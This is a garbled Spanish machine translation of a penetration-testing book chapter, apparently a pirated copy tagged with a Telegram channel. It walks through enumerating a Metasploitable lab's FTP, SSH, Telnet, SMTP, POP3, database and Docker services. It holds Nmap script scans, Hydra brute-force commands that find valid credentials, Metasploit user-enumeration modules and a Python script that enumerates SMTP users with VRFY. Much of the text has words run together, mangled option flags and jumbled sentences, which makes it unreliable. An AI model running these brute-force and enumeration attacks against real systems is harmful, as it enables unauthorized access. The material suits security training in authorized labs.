explotación.kcorp.local(172.16.0.101) Hostsup (0.00062 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 21/tcpopenftpvsftpd2.3.4 |_ftp-anon:AnónimoFTPloginallowed(FTPcode230) |ftp-syst:|STAT:| Estado servidor del FTP: |Conectado a172.16.0.102 |Iniciado sesión en ftp |TIPO:ASCII |Ningún límite de ancho de banda de sesión |El tiempo de espera de la sesión es de 300 segundos |La conexión de control es texto sin formato |Las conexiones de datos serán texto sin formato |vsFTPd2.3.4-seguro,rápido,estable | _Endofstatus Dirección MAC: 00: 0C: 29: D2: 1A: B1 (VMware) Advertencia: Los resultados de OSScan pueden no ser confiables porque no pudimos encontrar al menos 1 puerto abierto y 1 cerrado Tipo de dispositivo: propósito general Ejecutando:Linux2.6.X OSCPE:cpe:/o:linux:linux_kernel:2.6 Detalles del sistema operativo: Linux 2.6.9-2.6.33 Distancia de red: 1 salto Información de servicio: SO: Unix Canal de Telegram : @IRFaraExam Machine Translated by Google Detección de SO y servicio realizada. Informe cualquier resultado incorrecto en https:// nmap.org/submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 1,93 segundos De acuerdo con los resultados del escaneo anterior, hemos identificado lo siguiente (vamos a validar la información durante la fase de explotación): Podemos iniciar sesión en el servidor FTP con credenciales anónimas. LaversióndelservidorFTPesvsftpd2.3.4. Tenemos un reconocimiento de que la comunicación está en texto claro. AdvancedScriptingScanwithNmap El análisis básico del script ÿsC ( técnicamente se llama el script predeterminado) no analiza para todo. En este paso, incluiremos todas las funcionalidades de escaneo de scripts en Nmap para el servicio FTP utilizando la opción –script =ftp*. preguntándose: "¿Por qué no ejecuté este escaneo desde el principio?" y aprender acerca de su tiempo de paso a paso objetivo, le dará un ángulo diferente y darle la capacidad de tomar mejores decisiones. (La prueba de penetración no se trata de ejecutando escáneres; es la misma metodología.) root@kali:~#nmapÿsVÿOÿÿscript=ftp*ÿp21ÿ T5metasploitable.kcorp.local ComenzandoNmap7.80(https://nmap.org)a las 2020-06-0414:41EDT NSE:[ftp-bounce]PORTresponse:500IllegalPORTcommand. NSE: [ftp-brute] nombres de usuario: Límite de tiempo 3m00 excedido. NSE: [ftp-brute] nombres de usuario: Límite de tiempo 3m00 excedido. NSE: [ftp-brute] contraseñas: Límite de tiempo 3m00 excedido. Nmapscan informa sobre la explotación.kcorp.local(172.16.0.101) Hostsup (0.00031 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 21/tcpopenftpvsftpd2.3.4 |_ftp-anon:AnónimoFTPloginallowed(FTPcode230) |ftp-brute:| Cuentas:| usuario:usuarioÿ Credenciales válidas |_Estadísticas: 1166 conjeturas realizadas en 181 segundos, promedio de ps: 6.3 |ftp-syst:|STAT:| Estado servidor del FTP: |Conectado a172.16.0.102 Canal de Telegram : @IRFaraExam Machine Translated by Google |Iniciado sesión en ftp |TIPO:ASCII |Ningún límite de ancho de banda de sesión |El tiempo de espera de la sesión es de 300 segundos |La conexión de control es texto sin formato |Las conexiones de datos serán texto sin formato |vsFTPd2.3.4-seguro,rápido,estable | _Endofstatus |ftp-vsftpd-puerta trasera: |VULNERABLES: |vsFTPdversión2.3.4puerta trasera Estado: VULNERABLE (explotable) ID:BID:48539CVE:CVE-2011-2523 vsFTPdversion2.3.4backdoor, esto se informó en 2011|||07-04. Fecha de divulgación:2011-07-03 Explotar resultados: |||Comando Shell:id |Resultados:uid=0(raíz)gid=0(raíz) |Referencias: |http://scarybeastsecurity.blogspot.com/2011/07/alert vsftpd-download-backdoored.html |https://github.com/rapid7/metasploit framework/blob/master/ modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 2523 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011- | _[…] https://www.securityfocus.com/bid/48539 Los siguientes son los sorprendentes resultados encontrados en el escaneo de secuencias de comandos anterior (nosotros los explotará en el siguiente capítulo): El reconocimiento del inicio de sesión anónimo (ya lo encontramos en el primer escanear). La fuerza bruta fue capaz de encontrar las credenciales de la cuenta. Encontramos que la versión del servidor puede ser explotada. Más técnicas de fuerza bruta Si desea realizar un análisis de fuerza bruta adicional, puede utilizar Hydra para obtener el trabajo hecho: root@kali:~# hydraÿt10ÿL/opt/SecLists/Usernames/topÿusernamesÿ shortlist.txt-P/opt/SecLists/Passwords/xato-net-10-million- Canal de Telegram : @IRFaraExam Machine Translated by Google contraseñasÿ1000.txtftp://metasploitable.KCorp.local Hydrav9.0(c)2019byvanHauser/THC-Favor de no usar en organizaciones militares o de servicios secretos, o para fines ilegales. Hydra(https://github.com/vanhauser-thc/thc-hydra)a partir de2020-06-0420:07:27 [ADVERTENCIA]Restorefile(tiene10segundosparaabortar...(useoptionItoskipwaiting))desdeunasesiónanteriorencontrada,paraevitarsobrescribir,./hydra.restore [ DATA]max10tasksper1server,overall10tasks,17000loginttrys(l:17/p:1000),~1700triespertask [DATA]attackingftp://metasploitable.KCorp.local:21/ [STATUS]190.00tries/ min,190triesin00:01h,16810todoin01:29h, 10activo [21] [ftp]host:metasploitable.KCorp.locallogin:ftppassword:123456789 […] El comando Hydra utiliza las siguientes opciones: t10 : Ejecutar con 10 subprocesos paralelos L :rutaalarchivodeusuarios P :Rutaalarchivodecontraseñas Enelpróximocapítulo,repasaremoslafasedeexplotación(lainformaciónenestecapítuloesunaentradaparalafase SSH (Puerto 22) Ya aprendimos en el capítulo anterior cómo funciona el protocolo SSH. Si no está familiarizado con la diferencia entre las claves públicas y las claves privadas y cómo se usan en el protocolo SSH, vuelva al primer capítulo de este libro donde cubrí este tema con ejemplos. Escenarios de explotación para un servidor SSH Un servidor SSH se puede explotar de diferentes maneras; estos son los escenarios comunes que debería estar buscando (nuevamente, necesita saber cómo será la explotación del servicio): Credenciales de fuerza bruta (este es nuestro objetivo principal durante la fase de enumeración). Canal de Telegram : @IRFaraExam Machine Translated by Google Agregar una clave pública al archivo de claves autorizadas en el servidor (pero necesitará un shell para poder escribir en ese archivo; en otras palabras, primero deberá tener acceso al host). SSH se puede usar para activar otro host en la red. Esto se puede lograr si un host está comprometido y el atacante tiene acceso a las claves públicas y privadas en el host de la víctima (girar es una tarea posterior a la explotación). Encuentre un exploit público asociado con la versión del servidor Telnet de destino. Si el atacante puede leer el archivo de claves autorizadas de un algoritmo DSA (no RSA), entonces el atacante puede usar las claves privadas públicas generadas e intentar hacerlas coincidir con la clave pública dentro del archivo de claves autorizadas . (Primero necesitará un shell remoto o leer el archivo usando la vulnerabilidad de "inclusión de archivos locales" de una aplicación web. Trabajaremos en LFI en los próximos capítulos). $ssh-i[archivo de clave privada][usuario@ftp_server_ip] Puede leer un artículo detallado sobre este último ataque aquí: https://github.com/g0tmi1k/debian-ssh AdvancedScriptingScanwithNmap Ejecutemos una tarea de enumeración rápida para obtener información sobre el servidor SSH en el host de Metasploitable: root@kali:~#nmapÿsVÿOÿsCÿp22ÿT5metasploitable.kcorp.local InicioNmap7.80(https:// nmap.org)en2020-06-0510:55EDT Nmapscanreportformetasploitable.kcorp.local(172.16.0.101) Hostsup (0.00036 latencia). PORTSTATESERVICEVERSION 22/tcpopensshOpenSSH4.7p1Debian8ubuntu1(protocolo 2.0) |ssh-hostkey:| 102460:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd(DSA ) | _204856:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3(RSA) Dirección MAC: 00: 0C: 29: D2: 1A: B1 (VMware) Advertencia: Los resultados de OSScan pueden no ser confiables porque no pudimos encontrar al menos 1 puerto abierto y 1 puerto cerrado Tipo de dispositivo: propósito general En ejecución: Linux 2.6.X […] Canal de Telegram : @IRFaraExam Machine Translated by Google La única información en los resultados del escaneo anterior es la versión del control remoto servidor SSH. A continuación, tenemos que ejecutar el análisis completo del script con Nmap para ver si podemos detectar más problemas con el servidor SSH de destino: root@kali:~# nmapÿsVÿOÿÿscript=ssh*ÿp22ÿ T5metasploitable.kcorp.local A partir de Nmap7.80(https://nmap.org) a las 2020-06-0511:00EDT […] Nmapscan informa sobre la explotación.kcorp.local(172.16.0.101) Hostsup (0.00075 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 22/tcpopensshOpenSSH4.7p1Debian8ubuntu1(protocolo 2.0) |ssh-auth-methods:| Métodos de autenticación admitidos: |clavepublica |_contraseña |ssh-brute:| Cuentas:| usuario:usuarioÿ Credenciales válidas |_Estadísticas: 204 conjeturas realizadas en 181 segundos, promedio de fps: 1,2 |ssh-hostkey:| 102460:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd(DSA) |_204856:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3(RSA) |ssh-publickey-aceptance:| _AcceptedPublicKeys:Nopublickeysaccepted |_ssh-run: Error al especificar las credenciales y el comando para ejecutar. […] Los resultados anteriores muestran que Nmap encontró una credencial válida para autenticar de forma remota en el servidor SSH. Recuerde que este hallazgo es significativo porque, con esas credenciales, podemos tener acceso remoto al servidor de destino. SSH de fuerza bruta con Hydra Al igual que hicimos en el FTP de fuerza bruta, podemos usar Hydra para SS Haswell. use las mismas opciones que usamos para el escenario de FTP: root@kali:~# hydraÿt10ÿL/opt/SecLists/Usernames/topÿusernamesÿ shortlist.txt-P/opt/SecLists/Passwords/xato-net-10-millioncontraseñasÿ1000.txtssh://metasploitable.KCorp.local Hydrav9.0(c)2019byvanHauser/THC: no lo utilice en organizaciones militares o de servicios secretos, ni para fines ilegales. Canal de Telegram : @IRFaraExam Machine Translated by Google Hydra (https://github.com/vanhauser-thc/thc-hydra) a partir de 2020-06-0511:11:19 [ADVERTENCIA] Muchas configuraciones de SSH limitan el número de tareas paralelas, se recomienda reducirlas: use-t4 [DATA] max10tasksper1server,overall10tasks,17000logentries(l:17/ p:1000),~1700intentos por tarea [DATOS]atacandosh://metasploitable.KCorp.local:22/ [ESTADO]130.00intentos/ min,130intentosen00:01 h, 16870todo en 02:10 h, 10 activo 1 de 1 objetivo completado, 0 contraseñas válidas encontradas Hydra (https://github. com/vanhauser-thc/thchydra)finalizadoen2020-06-0514:34:08 Desafortunadamente, el resultado del escaneo anterior no encontró ningún resultado. En la siguiente sección, "Técnicas avanzadas de fuerza bruta", aprenderá cómo ejecutar ataques de fuerza bruta como un campeón. Avanzada bruta ForcingTechniques scantechnique.Inthepreviousexample Nowit'stimetostartusingMetasploitsothatwecanleverageourbrute fuerza, credentials.Infact yousawthatwedidn'tfindany, wetriedtorunablindbrute-forceattackagainstmytarget host.Inthisexample, wewilluseMetasploittoscanforvalidusernamesonthe Metasploitablehostfirst; entonces, wewillattackthosespecificusersinsteadofjust guessing.TorunMetasploit, wewilltype msfconsole intoourterminalwindow: root@kali:~#msfconsole Después de eso, se carga la ventana de Metasploit y realizaremos las siguientes acciones: 1. Utilice el módulo de enumeración llamado ssh_enumusers . 2. Identifique la dirección IP de Metaploitable. 3.EstablezcaelnúmerodepuertoSSHremoto. 4. Identifique la ruta al archivo de diccionario del usuario. 5. Establezca el número de ejecución de subprocesos paralelos en 25. 6.Finalmente, ejecútelo. msf5>useauxiliary/scanner/ssh/ssh_enumusers msf5auxiliary(scanner/ssh/ssh_enumusers)>setRHOSTS172.16.0.101 msf5auxiliary(scanner/ ssh/ssh_enumusers)>setUSER_FILE Canal de Telegram : @IRFaraExam Machine Translated by Google /usr/share/wordlists/metasploit/namelist.txt msf5auxiliary(scanner/ssh/ssh_enumusers)>setPORT22 msf5auxiliary(scanner/ssh/ssh_enumusers)>setTHREADS25 msf5auxiliary(scanner/ssh/ssh_enumusers)>run [*]172.16.0.101:22-SSH-Usingmalformedpackettechnique [*]172.16.0.101:22-SSHCheckingforfalsepositives [*]172.16.0.101:22-SSH-Startingscan [+]172.16.0.101:22SSH-User'backup 'encontrado [+]172.16.0.101:22-SSH-Usuario'dhcp'encontrado [+]172.16.0.101:22-SSH-Usuario'ftp'encontrado [+]172.16.0.101:22-SSHUsuario'juegos'encontrado [+]172.16.0.101:22-SSH-Usuario'irc'encontrado [+]172.16.0.101:22-SSH-Usuario'mail'encontrado [+]172.16.0.101:22-SSHUsuario'mysql'encontrado [+] ]172.16.0.101:22-SSH-User'news'found [+]172.16.0.101:22-SSH-User'proxy'found [+]172.16.0.101:22-SSH-User'root'found [+]172.16 .0.101:22-SSH-User'service'found [+]172.16.0.101:22-SSH-User'snmp'found [+]172.16.0.101:22-SSH-User'syslog'found [+]172.16.0.101 :22-SSH-User'user'found [*]Ejecución de módulo auxiliar completada msf5auxiliary(scanner/ssh/ ssh_enumusers)> Se han encontrado muchos nombres de usuario en los resultados de salida anteriores. A continuación, guardaremos todos los nombres de usuario en un archivo users.txt y almacenaremos el archivo en el directorio de inicio raíz. Tome nota de que estamos usando un archivo de diccionario de contraseñas más pequeño en el siguiente ejemplo para terminar más rápido. Finalmente, estamos usando la opción ÿensr por las siguientes razones : "n" significa contraseña nula (la contraseña está vacía). "s" representa la contraseña de inicio de sesión (nombre de usuario = contraseña). "r" significa inicio de sesión inverso (por ejemplo, si el nombre de usuario es root, entonces la contraseña será to o ). root@kali:~#hydraÿt10ÿensrÿL/root/users.txtÿP/opt/SecLists/Passwords/ darkweb2017ÿtop100.txtssh://metasploitable.KCorp.local[…] [22][ssh] host:metasploitable.KCorp.locallogin:contraseña de servicio:servicio [22] [ssh]host:metasploitable.KCorp.locallogin:contraseña de usuario: Canal de Telegram : @IRFaraExam Machine Translated by Google usuario 1 de 1 objetivos completados con éxito, 2 contraseñas válidas encontradas Enelsiguientecapítulo,explotaremoslosresultadosqueencontramosanteriormente.Además, profundizaremos en cada escenario de explotación de SSH. Telnet (Puerto 23) Telnet es una forma antigua de conectarse a un host remoto usando el protocolo TCP en el puerto 23 para manipular el host usando la línea de comando (como SSH). A diferencia de SSH, la comunicación Telnet no es segura y se transmite en texto claro. Este protocolo se usaba comúnmente en dispositivos de red heredados y también en sistemas operativos Windows. Estas son las debilidades comunes en Telnet: Las credenciales de inicio de sesión se envían en texto sin cifrar. El texto de la línea de comandos no está cifrado. Escenarios de explotación para el servidor Telnet Un servidor Telnet se puede explotar de diferentes maneras. Estos son los escenarios comunes que encontrará durante su compromiso: Credenciales de fuerza bruta Olfateando credenciales de texto sin cifrar Husmear en busca de líneas de comando no cifradas Búsqueda de un exploit público asociado con la versión del servidor Telnet de destino Flujo de trabajo de enumeración Hay tres tareas que ejecutaremos para este flujo de trabajo de numeración avanzada: ServiciosbásicoscanusandoNmap Exploración avanzada de secuencias de comandos con Nmap Credenciales de fuerza bruta usando Hydra Escaneo de servicio Canal de Telegram : @IRFaraExam Machine Translated by Google En el primer paso, ejecutaremos análisis de servicios básicos en Nmap para obtener una idea del servidor explotable Telnet Metas de destino: root@kali:~# nmapÿsVÿOÿsCÿp23ÿT5metasploitable.kcorp.local InicioNmap7.80 (https://nmap.org)en2020-06-0813:39EDT Nmapscanreportformetasploitable.kcorp.local(172.16.0.101) Hostsup (0.00048 latencia). PORTSTATESERVICEVERSION 23 / tcpopentelnetLinuxtelnetd MACAddress: 00: 0C: 29: D2: 1A: B1 (VMware) Advertencia: Los resultados de OSScan pueden no ser confiables porque no pudimos encontrar al menos 1 puerto abierto y 1 cerrado Tipo de dispositivo: propósito general En ejecución: Linux 2.6.X OSCPE: cpe:/o: linux: linux_kernel: 2.6 Detalles del sistema operativo: Linux 2.6.9-2.6.33 Distancia de red: 1 salto Información de servicio: SO: Linux; CPE: cpe: / o: linux: linux_kernel […] Nmapdone: 1 dirección IP (1 host up) escaneada en 8,98 segundos AdvancedScriptingScan El siguiente paso es buscar más debilidades usando el escaneo completo de secuencias de comandos Telnet de Nmap: root@kali:~# nmapÿsVÿOÿÿscript=telnet*ÿp23ÿ T5metasploitable.kcorp.local […] PORTSTATESERVICEVERSION 23/ tcpopentelnetLinuxtelnetd |telnet-brute:| Accounts:|user:userÿValidcredentials | _Statistics:Realizado1227conjeturasen184segundos,averagetps:6.6 |telnet-encryption:| _Telnetserverdoesnotsupportencryption […] ServiceInfo: SO: Linux; CPE: cpe: / o: linux: linux_kernel […] Nmapdone: 1 dirección IP (1 host up) escaneada en 185,20 segundos De acuerdo con los resultados de salida anteriores, concluimos lo siguiente: Podemos iniciar sesión de forma remota en el servidor Telnet con nombre de usuario = usuario y Canal de Telegram : @IRFaraExam Machine Translated by Google contraseña=usuario. Recibimos el reconocimiento de que la comunicación no está cifrada. Fuerza bruta con Hydra Solo para verificar dos veces, ejecutaremos Hydra para ver si podemos encontrar más credenciales que Nmap: root@kali:~# hydraÿt10ÿensrÿL/opt/SecLists/Usernames/topÿ usernamesÿ shortlist.txtÿP/opt/SecLists/Passwords/darkweb2017ÿ top100.txttelnet:// metasploitable.KCorp.local [ …] [23] [telnet]host:metasploitable.KCorp.locallogin:usuariocontraseña: usuario Hydra encontró la misma cuenta de credenciales. Protocolos de correo electrónico Hay tres protocolos de correo electrónico que necesitará comprender para sus fases de enumeración y explotación: SMTP: el protocolo simple de transferencia de correo se utiliza para enviar correos electrónicos y utiliza el puerto TCP 25. SMTP se puede utilizar a través de SSL mediante el puerto 465. POP3: se utiliza el Protocolo de oficina de correos V3 para recibir correos electrónicos y se utiliza el puerto 110. POP3 sobre SSL utiliza el puerto 995. IMAP4: El protocolo de acceso a mensajes de Internet V4 se usa para almacenar y administrar correos electrónicos en el servidor, y se usa el puerto 143. IMAP4 sobre SSL usa el puerto 993. SMTP (Puerto 25) Usaremos el servidor vulnerable Metasploitable para este ejemplo. Pero antes de continuar, tratemos de entender lo que estamos buscando en esta etapa: Compruebe si el servidor admite los comandos VRFY para poder enumerar usuarios Compruebe si existe un exploit público para el servidor de destino. (Discutiremos este punto en el Capítulo 7, “Fase de explotación”). NmapBasicEnumerationNmapBasicEnumeration Canal de Telegram : @IRFaraExam Machine Translated by Google Usaré el comando de numeración básica de Nmap para evaluar el host de destino: root@kali:~# nmapÿsVÿOÿsCÿp25ÿT5metasploitable.kcorp.local ComenzandoNmap7.80(https://nmap.org)a las 2020-06-0914:25EDT Nmapscan informa sobre la explotación.kcorp.local(172.16.0.101) Hostsup (0.00033 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 25/tcpopensmtpPostfixsmtpd |_smtp- commands:metasploitable.localdomain,PIPELINEING,SIZE10240000,VRFY,ETRN,STARTTLS,ENHANCEDS En los resultados anteriores, tenemos dos hallazgos: Descubrimos que el servidor admite el comando VRFY . Este comando permitirnos enumerar a los usuarios en el servidor. Contamos con la versión del servidor de correo electrónico SMT. Enumeración avanzada de Nmap A continuación, usaremos la potencia de Nmap y sus características avanzadas para obtener aún más información: root@kali:~#nmap-sV-O-p25--script=smtp*-T5metasploitable.kcorp.local ComenzandoNmap7.80(https://nmap.org)a las 2020-06-0914:38EDT Nmapscan informa sobre la explotación.kcorp.local(172.16.0.101) Hostsup (0.00050 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 25/tcpopensmtpPostfixsmtpd |_smtp- commands:metasploitable.localdomain,PIPELINING,SIZE10240000,VRFY,ETRN,STARTTLS,ENHANCEDST |_smtp-open-relay:El servidor no parece ser un relé abierto, todas las pruebas fallaron |smtp-vuln-cve2010-4344:| _TheSMTPserverisnotExim:NOTVULNERABLE […] Hay dos cosas a tener en cuenta en los resultados del análisis anterior: Nmap no pudo listar a los usuarios en el servidor. (Nmap usó el RCPT método para enumerar usuarios). Canal de Telegram : @IRFaraExam Machine Translated by Google El servidor no es vulnerable a las vulnerabilidades mtp-vuln-cve2010-4344. EnumeratingUsers En los escaneos de Nmaps anteriores, no estábamos en la mesa para enumerar a los usuarios en el servidor, y me alegra ver eso. ¡No cuente siempre con un escáner para hacer el trabajo! ¿Recuerda que aprendió que el comando VRFY le permitirá enumerar usuarios? Pongámoslo en práctica. Usaremos netcat para conectarnos al servidor y buscar dos usuarios: Usuario gus , que no existe Usuario raíz, que existe en el servidor root@kali:~# nc172.16.0.10125 220metasploitable.localdomainESMTPPostfix(Ubuntu) VRFYgus 5505.1.1<gus>: Dirección del destinatario rechazada: Usuario desconocido en la tabla de destinatario local VRFYroot 2522.0.0root ^C root@kali:~# La metodología anterior es manual. Es un juego de adivinanzas y no es profesional. Aprendió del ejemplo anterior cómo funciona. Pero para enumerar realmente a los usuarios, necesitamos usar un escaneo automático . msf5> useauxiliary/scanner/smtp/smtp_enum msf5auxiliary(scanner/smtp/smtp_enum) >setRHOSTS172.16.0.101 RHOSTS=>172.16.0.101 msf5auxiliary(scanner/smtp/smtp_enum)>ejecutar [*]172.16.5.101:26.16-101 0.101:25Banner:220metasploitable.localdomainESMTPPostfix(Ubuntu) [+]172.16.0.101:25-172.16.0.101:25Usuarios encontrados:,backup,bin,daemon,distccd,ftp,games,gnats,irc,libuuid,list,lp,mail, man,mysql,noticias,nadie,postfix,postgres,postmaster,proxy,servicio,sshd,sync,sys,syslog,user,uucp,wwwÿ data [*]172.16.0.101:25-Scanned1of1hosts (100% completo) [*]Ejecución del módulo auxiliar completada msf5auxiliary(scanner/smtp/smtp_enum)> Nuevamente, ejecutar las herramientas automatizadas no nos dio un resultado preciso. Si observa detenidamente el ejemplo manual anterior, el comando VRFY respondió que el Canal de Telegram : @IRFaraExam Machine Translated by Google existe un usuario raíz pero el módulo smtp_enum no mostró a ese usuario. Aquí es donde los lenguajes de programación resultan útiles en este nivel. En el siguiente ejemplo, aprenderá a desarrollar su propio script utilizando Python. importsocket importsys tiempo de importación defprint_welcome(): print("\r\nBienvenidoalarenumeracióndeusuariosSMTPsuperscan\r\n") print("============================== =================") defenumerate_smtp(dirección_ip): #Pathtotheusersdictionaryfile users_file_path="/usr/ share/metasploit marco/datos/listas de palabras/unix_users.txt" #AbraelarchivodetextoenmodoLecturayempieceanumerarconopen(users_file_path,'r')asusers_file: foruserinusers_file: #Cleanuptheuservalue user=user.strip() #Noprocesarunvalordeusuariovacío siusuario=="": continuar tratar: #CreateaSocketobject sok=socket.socket(socket.AF_INET, enchufe.SOCK_STREAM) #ConnecttotheSMTPServer sok.connect((ip_address,25)) #Recibeelbannerdesdeelservidor primero sok.recv(1024) #Verificarsielusuarioexisteenelservidorutilizando elcomandoVRFY sok.send('VRFY'+usuario+'\r\n') #Dormirpor1segundo para no inundar la hora del servidor.sleep(1) #Gettheresponsefromtheserver results=sok.recv(1024) if(not"rejected"inresults): print("%s:Found"%user) exceptException: print("¡Se produjo un error!") Canal de Telegram : @IRFaraExam Machine Translated by Google finalmente: #Closetheconnectionsocket sok.close() #Hacerle saber al usuario que terminamos de imprimir ("\ r \ nEl programa ha terminado de enumerar usuarios. \ R \ n") defmain(): print_welcome() enumerate_smtp(sys.argv[1]) if__name__=='__principal__': principal() Intentemos ejecutar el código Python anterior en la ventana de la terminal: root@kali:~#python./smtp_users.py172.16.0.101 Bienvenido a la superexploración de enumeración de usuarios SMTP ============================================== backup:Encontrado bin:Encontrado daemon:Encontrado distccd:Encontrado ftp:Encontrado juegos:Encontrado gnats:Encontrado irc:Encontrado libuuid:Encontrado lista:Encontrado lp:Encontrado correo:Encontrado man:Encontrado mysql:Encontrado noticias:Encontrado nadie:Encontrado postfix: Encontrado postgres:Encontrado postmaster:Encontrado proxy:Encontrado root:Encontrado ROOT:Encontrado servicio:Encontrado sshd:Encontrado sync:Encontrado sys:Encontrado syslog:Encontrado usuario:Encontrado uucp:Encontrado www-data:Encontrado Canal de Telegram : @IRFaraExam Machine Translated by Google El programa ha terminado de enumerar los usuarios. ¡Eso es lo que llamo enumerar como un jefe! POP3 (Puerto 110) e IMAP4 (Puerto 143) En esta etapa, todo lo que queremos hacer es acceder a la bandeja de entrada de un usuario existente en el servidor. Para que esto funcione, debemos asegurarnos de que el servidor de correo esté instalado en el host de destino, por lo que veremos lo siguiente: POP3 puerto 110 abierto, y tal vez el servidor permita POP3 sobre SSL (usando el puerto 995) IMAP4puerto143abierto,yquizáselservidorpermitaIMAPsobreSSL(usandoelpuerto993) Un escaneo rápido de Nmaps a nuestro servidor de correo de destino nos dará la información que estamos buscando (este es un servidor de correo de Linux y no el host de Metasploitable): root@kali:~#nmapÿsVÿOÿsCÿp110,995,143,993mail.kcorp.local InicioNmap7.80(https:// nmap.org)en2020-06-1014:26EDT Nmapscanreportformail.kcorp.local(172.16.0.100 ) Host (0,00035 latencia). PORTSTATESERVICEVERSION 110/tcpopenpop3Dovecotpop3d |_pop3capabilities:SASLRESP-CODESSTLSAUTH-RESP-CODEPIPELININGTOPCAPAUIDL […] 143/tcpopenimapDovecotimapd […] 993/tcpopenimaps? […] 995/tcpopenpop3s? […] Cuentas de correo electrónico POP3 de fuerza bruta La mejor manera de aprovechar la fuerza bruta para POP3 es poder extraer los usuarios primero y guardarlos en un archivo (ya lo hicimos en la parte de enumeración de usuarios SMTP): $hydraÿL[archivo de usuarios]ÿP[archivo de contraseñas]pop3://[IP] Enelpróximocapítulo,aprenderácómoexplotaryaccederalabandejadeentradadel Canal de Telegram : @IRFaraExam Machine Translated by Google Machine Translated by Google Servidor de base de datos Oracle (Puerto 1521) El servidor de la base de datos de Oracle utiliza el puerto TCP 1521, y los mismos conceptos se aplican a Microsoft SQL Server cuando se trata de la enumeración: Credenciales de fuerza bruta Identificar si la versión instalada es explotable Análisis de enumeraciones básicas de la base de datos de Oracle $nmapÿsVÿOÿsCÿp1521[dirección IP] Exploración de enumeraciones avanzadas de la base de datos de Oracle $nmapÿsVÿOÿp1521ÿÿscript=oracle*[Dirección IP] Base de datos de fuerza bruta de Oracle $hydraÿs1521ÿL[archivo de usuarios]ÿP[archivo de contraseñas][IP] MySQL (Puerto 3306) El servidor de base de datos MySQL usa el puerto TCP 3306, y se le aplican los mismos conceptos cuando se trata de la enumeración, como se explicó anteriormente: Credenciales de fuerza bruta Identificar si la versión instalada es explotable Análisis de enumeraciones básicas de MySQL $nmapÿsVÿOÿsCÿp3306[dirección IP] Exploración de enumeraciones avanzadas de MySQL $nmapÿsVÿOÿp1521ÿÿscript=mysql*[Dirección IP] Fuerza bruta de MySQL $hydraÿL[archivo de usuarios]ÿP[archivo de contraseñas]MySQL://[IP] Protocolos CI/CD La integración continua/implementación continua (CI/CD) es la tendencia más reciente en los proyectos y está estrechamente relacionada con DevOps. Canal de Telegram : @IRFaraExam Machine Translated by Google Dockercontainers Jenkins Ventana acoplable (Puerto 2375) AppendixBcoversDockertechnology.Youarehighlyencouragedtocheckit outbeforeproceedingwiththistopic.Generally, ahostrunningDockerwillbe completelytransparentforyou, andyouwon'tbeabletoassumethatthetarget hosthasDockerinstalled (checkthefollowingexample) berunningonaseparatenetwork .Dockercontainerswill, puertos andit'sfortheusertochoosetoopenthese. (I'massumingyouunderstandthispointalready.Ifnot, pleaserefertothe apéndice.) Thistohackintothesystems I'veseencaseswhereemployeeswillinstallDockeronthecloudand startopeningportsontheinternet, andthat'sgoodforus-weneedpeoplelike! A veces, estos analistas de DevOps irán más allá de la imaginación y abrirán el puerto del motor Docker TCP2375, también conocido como un demonio Docker. Si esto sucede, significa que podemos manipular el motor Docker de forma remota creando contenedores y mucho más más. Entonces, ¿cómo se ve escanear un host donde está instalado Docker y no tiene el puerto daemon abierto? En el siguiente ejemplo, escanearemos un host Linux donde está instalado Docker y también tenemos un contenedor de correo ejecutándose: root@kali:~#nmapÿsVÿpÿ ÿT5172.16.0.100 Inicio de Nmap 7.80 (https://nmap.org) a las 2020-06-1209:51EDT Nmapscanreportfor172.16.0.100 Hostisup(0.00075slatency). NotShown: 65525 Círculo PortStatesViceVersion tcpopensmppostFixsmtpd 25 / 80 / tcpopenhttpninx 110 / tcpopenpop3dovecotpop3d 143 / tcpopenimapdovecotimapd 443 httpnginx / tcpopenssl 465 / / tcpopenssl / smtppostfixsmtpd 587 / tcpopensmtpdftfixsmtpd 993 / tcpopenimaps? tcpopenpop3s? 995/ 4190/tcpopensieveDovecotPigeonholesieve1.0 MACAddress:00:0C:29:55:E6:4B(VMware) Información de servicio:Host:mail.kcorp.local […] Canal de Telegram : @IRFaraExam Machine Translated by Google En los resultados del análisis anterior, nada muestra que el host tenga un motor Docker instalado. Todo lo que vemos es que este host tiene un servidor de correo en ejecución, pero la contenedorización es invisible. Ahora, tenemos un segundo host para CI/CD en ejecución, y el puerto del demonio Docker está abierto (TCP2375). En este host Linux, tenemos Docker instalado y ejecutando un contenedor Jenkins. root@kali:~# nmapÿsVÿpÿ ÿT5172.16.0.103 Inicio de Nmap 7.80 (https://nmap.org) a las 2020-06-1210:06EDT Nmapscanreportfor172.16.0.103 Hostisup(0.00082slatency). No se muestra: 65532 puertos cerrados PORTSTATESERVICEVERSION 2375/ tcpopendockerDocker19.03.8 8080/ tcpopenhttpJetty9.2.z-SNAPSHOT 50000/ tcpopenhttpJenkinshttpd2.60.3 MACAddress:00:0C:29:96:F8:6C(VMware) Ahora, si se ejecutaran los scripts de Nmap contra el puerto de Docker, veremos más detalles, pero nada que lleve a un escenario de explotación real (lo explotaremos en el siguiente capítulo): root@kali:~# nmapÿsVÿOÿÿscript=docker*ÿp2375ÿT5172.16.0.103 Inicio de Nmap7.80(https://nmap.org) a las 2020-06-1211:31EDT Nmapscanreportfor172.16.0.103 Hostisup (0,00040 latencia). PORTSTATESERVICEVERSION 2375/tcpopendockerDocker19.03.8 |dockerversion:|GoVersion:go1.13.8 | KernelVersion:5.4.0-37-generic |Plataforma:| Nombre:|Arch:amd64 |GitCommit:afacb8b7f0 | Componentes:|[…] Jenkins (Puerto 8080/50000) Jenkins es un orquestador durante el proceso de implementación del código fuente. Durante una implementación normal, Jenkins se programará en un intervalo diario (o algo más) para ir y verificar el repositorio del código fuente, por ejemplo, GitHub Canal de Telegram : @IRFaraExam Machine Translated by Google (soitneedscredentialstobestoredinJenkinsinordertologintothe 